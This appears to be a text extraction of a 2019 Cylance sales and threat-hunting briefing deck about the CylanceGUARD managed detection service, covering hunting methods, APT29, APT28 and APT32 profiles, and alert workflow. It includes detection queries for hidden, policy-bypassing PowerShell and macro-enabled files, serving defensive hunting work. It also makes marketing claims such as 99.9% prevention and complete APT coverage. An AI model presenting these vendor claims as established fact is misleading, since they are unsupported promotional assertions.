CylanceGUARD™ Threat Hunting Intelligence Briefing

Jason Bevis

VP, Global MDR, ThreatZERO™, & International

Services

Dave Cundiff

Sr Director, CylanceGUARD

SafeHarbor

The information in this presentation is confidential and proprietary to Cylance® and may not

be disclosed without the permission of Cylance. This presentation is not subject to your license

agreement or any other service or subscription agreement with Cylance. Cylance has no

obligation to pursue any course of business outlined in this document or any related

presentation, or to develop or release any functionality mentioned therein.

This document, or any related presentation and Cylance's strategy and possible future

development, product, and/or platform direction and functionality are all subject to change

and may be changed by Cylance at any time for any reason without notice. The information

on this document is not a commitment, promise, or legal obligation to deliver any material,

code, or functionality. This document is for informational purposes and may not be incorporated

into a contract. Cylance assumes no responsibility for errors or omissions in this document.

SafeHarbor

AGENDA

Intelligence and Methodology-based Processes

How MITRE is used to protect against multiple APT

CylanceGUARD:

MTTD (Mean Time to Discovery) and

MTTR (Mean Time to Response)

What It Means for Your Teams:

Benefits of CylanceGUARD’s Unified Threat Hunting,

Detection, and Response Approach

What is CylanceGUARD

▪ A 24X7 managed detection and response offering

▪ Transparent portal interaction

▪ Mobile flexibility

▪ A solution to handled sophisticated and evolving attacks, alert

fatigue, and our customers skill or resource gaps

▪ A combination of several technologies and skilled resources to

provide our customers a managed solution for prevention

C Y L A N C E G U A R D

Analyst and

Threat Hunters

▪ Analyzes and prioritizes

▪ Automates analyst and incident

engagement

▪ Proactive alerting at the fingertips

▪ Context to streamline investigation

▪ Customer interaction with triage and

response

▪ Skilled Cylance Hunting Experts

▪ Prevent zero-day threats

Threat Validation and Triage

Mobile Warning and Interaction

Optics and Visibility

CylanceGUARD Components

ThreatZERO

▪ Prevention Expertise

▪ Prevent 99.9% of software

related threats

MOBILE

WARNING

ONGOING

PREVENTION

VALIDATE

& TRIAGECylance GUARD

Portal

24x7

User Interaction

USER PORTAL

ThreatZERO

Triage

Mobile

Hunting

What is Needed

MOBILITY

▪ We are concerned busy security analysts won’t

see alerts due to the volume of email the receive.

▪ We don’t expect our customers to sit glued to a

monitor 24X7X365.

▪ Our customers don’t have that kind of time.

MOBILE

WARNING

WORKFLOW

VISIBILITY

VISIBILITY

Time is of the essence. Need to eliminate

where an alert is sent but no one responds.

CylanceGUARD Tier Comparison

24x7 Threat Hunting

Email Alerts

Mobile Alerts and Escalation

ManagementProactive Threat Hunting 24X7

(Alert, Intelligence, and

Methodology Hunting)

Proactive Outreach for

Critical Alerts

Quarterly Prevention Review

(Ongoing review with

Cylance experts)

CylanceGUARD Reports

(Monthly Reports on Activity

and Threat Landscape)

Access to GUARD Analysts

(Incident Response

Guidance and Strategy)

CylanceGUARD

Standard

CylanceGUARD

Advanced

CylanceGUARD provides a foundation.

CylanceGUARD Advanced is a

comprehensive solution that meets an

organization needs for threat hunting.

Both offerings leverage the pre-execution

abilities of CylancePROTECT and the

post-execution of monitoring and blocking

associated with CylanceOPTICS.

ThreatZERO Configuration

and Assurance (Including

Cylance Product On-boarding)

Defined SLAs for Critical

Alerts

CylanceGUARD

Threat Hunting Maturity

The SANS Institute identifies a threat hunting maturity model as follows:

LEVEL 0

INITIAL▪ An organization relies primarily on automated reporting.

▪ Does little or no routine data collection.

LEVEL 1

MINIMAL▪ An organization incorporates threat intelligence indicator searches.

▪ Has a moderate or high level of routine data collection.

LEVEL 2

PROCEDURAL▪ An organization follows analysis procedures created by others.

▪ Has a high or very high level of routine data collection.

LEVEL 3

INNOVATIVE▪ An organization creates new data analysis procedures.

▪ Has a high or very high level of routine data collection.

LEVEL 4

LEADING▪ An organization automates the majority of successful data analysis procedures.

▪ Has a high or very high level of routine data collection.

Threat Hunting Types

Traditional Threat Management

Triggering events from products

such as CylancePROTECT and

CylanceOPTICS generating an alert

to be followed up on by a

CylanceGUARD analyst

ALERT

Internal and External Threat Data

The practice of gathered recent

intelligence from multiple internal and

external sources to identify new

campaigns and trigger a manual or

automated hunt

INTELLIGENCE

Process Based Hunting

CylanceOPTICS is leveraged to

continually review and search

across the environment. This is

conducted using a standard

methodology and backend analysis

technology to hunt threats

METHODOLOGY

Alert Based Hunting Framework

▪ CylancePROTECT® alerting (AI model, memdef, script control)

▪ 100 core CylanceOPTICS™ rules in the console

▪ 150+ custom rules used for CylanceGUARD and IR

▪ ATT&CK

▪ Contextual rules using ATT&CK TTPs and Framework

▪ APT 3 and APT 29 Use cases

▪ Prioritization of hunting and investigation

A L E R T - B A S E D H U N T I N G

Common Intelligence Hunting Sources

CONSULTING ON THE GROUND

IOCs/TTPs(+2000) IR engagements

THREAT RESEARCH

IOCs/TTPs

INTERNAL RESEARCH

CylanceGUARD

INTERNAL REPOSITORY OF

GOOD AND BAD SOFTWAREVirusTotal / Machine Learning Models

COMMUNITY-SHARED

INTELBlogs / Twitter / Git / Communities

RED TEAM

ADVERSARY SIMULATIONAPT 3 or APT 29 simulation / objectives

GIT Repository Intelligence Example

Ex: OS = windows AND dir extension = :(docm|dotm|xlm|xltm|xla|pptm|potm|ppsm|sldm)

▪ Perform visualization stacking on the names

▪ Look for potentially malicious macro files based on low frequency

Ex: OS = windows AND type = eventspowershell AND script_block = (hidden AND bypass AND (nop OR noninteractive OR noprofile))

HUNT THROUGH

DATA

5

RESEARCH

external intelligence GIT

repositories

1

COLLECT

artifacts from hosts

2

HUNT

for hits across the customer

based on new intelligence

3 4

PERFORM

additional level of

artifact collection

Multiple Intel Sources

Base 64

$s=New-Obj

PowerShell

Cobalt Strike

Encoded

Command

1. Incident Response engagement

2. Optics rule for Cobalt Strike initially applied

3. Hit on the rule as attacker tried to run their

software

4. Results in a triple base 64 encoded file

with GZIP and complied code

5. Threat Research does analysis of the

files obtained

6. Results in new rules

7. Results in several additional customer in

healthcare and other verticals targeted

Multiple Intel Source Mapping

INCIDENT RESPONSE

Custom Compiled Python

THREAT RESEARCH

RESULTS:

Identified similar activity in other customers

Taking Methodology

MITRE

ATT&CK

MATRIX

1. What do we know?

2. How is data compressed?

3. How is data encrypted?

4. What is allowed out of this enterprise from

a size limit and won’t raise flags?

5. What protocols are allowed outbound?

6. What methods allow exfiltration within this

organization?

7. Is there a scheduled transfer?

More Exfil Methodology

Methodology Package Deploy Analysis

APT32 Suspicious msmpeng

WINDOWS – SUSPICIOUS FILES

Common Threat Actor Staging Directories Damerau-Levenshtein Analysis

EXE Stacking Large Files Macro Stacking

Recent Files Stacking Suspicious System32 TXT File Stacking

Methodology Looking at the Archives

Attack Group Examples

APT29 APT28 APT32

Well organized and competent

group. Classified in 2008 as an

APT and believed to be Russian

State sponsored.

Russian State sponsored group

targeting political and military

targets. Highly skilled writing 0-day

exploitation malware.

First mentioned publicly in 2010.

Extremely adaptable, and

persistent even when identified.

Leverages a large assortment of

legitimate software.

APT29 Targeted Countries

North AmericaUnited States

Europe

Ireland

Belgium

Spain

Portugal

Czech Republic

Hungary

Luxembourg

Romania

Africa

Uganda

Asia Pacific

Azerbijan

Georgia

Kazakhstan

Kyrgystan

Ukraine

Uzbekistan

South America

None yet identified

Middle EastTurkey

APT29Industries Targeted and Motives

▪ Russian State Sponsored

▪ Cyber Espionage and data exfiltration

TARGETS

▪ Defense

▪ Government Agencies

▪ International Organizations

APT29 Coverage

Leveraging CylancePROTECT and

CylanceOPTICS provides

CylanceGUARD with the ability to

cover the totality of the APT29

techniques through a defense in

depth approach. While these

techniques are shown to be covered

by individual protection mechanisms

of the product, there is ample

overlap in the coverage.

0% 10% 20% 30% 40% 50% 60% 70% 80% 90% 100%

Collection

Command and Control

Credential Access

Defense Evasion

Discovery

Execution

Exfiltration

Initial Access

Instrumentation

Lateral Movement

Persistence

Privilege Escalation

Protocol

APT29 Coverage by Protection Type

Protect Refract CAE No Coverage

Leveraging the full

functionality of Cylance

Products provides

complete coverage.

North AmericaUnited States

Canada

EuropeBelarus

Belgium

Bulgaria

France

Germany

Hungary

Montenegro

Netherlands

Poland

Romania

Slovakia

Spain

Sweden

Switzerland

United

Kingdom

AfricaNone yet identified

Asia Pacific

Afghanistan

Armenia

China

Georgia

Japan

Kazakhstan

Latvia

Malaysia

Mongolia

South Korea

Tajikistan

UkraineSouth AmericaBrazil

Middle EastIran

Turkey

APT28 Targeted Countries

APT28Industries Targeted and Motives

▪ Russian State Sponsored

▪ Espionage and political manipulation

TARGETS

▪ Aerospace

▪ Cybersecurity

▪ Defense

▪ Embassies

▪ Government

▪ Hospitality

▪ International Organizations

▪ Media

0% 20% 40% 60% 80% 100%

Collection

Command and Control

Credential Access

Defense Evasion

Discovery

Execution

Exfiltration

Hijacking

Information

Initial Access

Lateral Movement

Media

Media

Persistence

Privilege Escalation

Removable Media

APT28 Coverage by Protection Type

Protect Refract CAE

APT28 Coverage

Given APT28’s proficiency with 0-

Day malware writing, the use of a

mathematical model with a high

degree of maturity, and a

significant number of dimensions

assessed in conjunction with a

highly adaptable EDR provides

the best chance of success.

Complete coverage of the

techniques used by APT28

through defense in depth

North AmericaUnited States

EuropeGermany

AfricaNone Yet identified

Asia Pacific

China

Australia

Philippines

Vietnam

South America

None yet identified

Middle EastNone yet identified

APT32 Targeted Countries

APT32Industries Targeted and Motives

▪ Vietnam State Sponsored

▪ Espionage

TARGETS

▪ Administration

▪ Communication

▪ Financial Services

▪ Government

▪ High-Tech

▪ International Organizations

▪ Legal Services

▪ Manufacturing

▪ Media

▪ Military

▪ Naval

0% 10% 20% 30% 40% 50% 60% 70% 80% 90% 100%

Collection

Command and Control

Credential Access

Defense Evasion

Discovery

Discovery

Execution

Exfiltration

Information

Initial Access

Instrumentation

Lateral Movement

Persistence

Privilege Escalation

Protocol

APT32 Coverage by Protection Type

Protect Refract CAE

APT32 Coverage

With APT32’s ability to adapt and

leverage a multitude of legitimate

tools, the ability to cover

endpoints with multiple layers of

protection is almost required to

combat this type of threat.

Defense in depth coverage

for a highly adaptable

adversary.

CylanceGUARD Alert Workflow

Detection and Response

Alert Initiated, Triage Begins

Cylance Products Generate Event

Response Sent, or Action Taken

Once CylancePROTECT and CylanceOPTICS are

tuned according to CylanceGUARD requirements, the

products will generate events used to correlate and

provide context for Analysts to triage and review.

Based upon the agreement between Cylance and the

Customer during onboarding, depending on the type of

events in an alert Cylance Analysts can perform

actions within PROTECT and OPTICS on behalf of the

customer or provide detailed response information for

the customer to take action.

Initial triage of alerts will begin within 90 minutes of

alert generation for CylanceGUARD Advanced

customers. This commitment is possible thanks to the

filtering orchestration built into CylanceGUARD for

classifying events as triggers, observational, or

whitelisted.

Incident Response Initiated

Alert Closed

If a critical alert requires incident response, the

CylanceGUARD team will work with any chosen IR

team, be that 3rd party, Internal, or Cylance Consulting,

to make the IR team more efficient and get you back

to Production ready as quickly as possible.

The entire workflow can be followed from Open to

Close within the CylanceGUARD console. Once all

actions have been taken the alert will be closed but

preserved for later review.

Benefits of CylanceGUARD

▪ Prevention First Approach

▪ Disrupts the Kill chain

▪ MDR/ EDR are Reactive by Nature

▪ Transparency of Activity

▪ Event Reduction Efficacy and Visibility into

the Workflow

▪ Clear Knowledge of MTTD (Mean Time to

Discovery) and MTTR (Mean Time to

Response)

▪ Mobile Application Security Convenience

▪ Orchestration Capability

▪ Customer specific workflow

▪ Event reduction to focus on critical alerts

▪ Package Deployment

▪ Advanced Threat Hunting

▪ Intelligence

▪ Methodology

Questions

Answers

© 2 0 1 9 C y l a n c e I n c . A l l R i g h t s R e s e r v e d .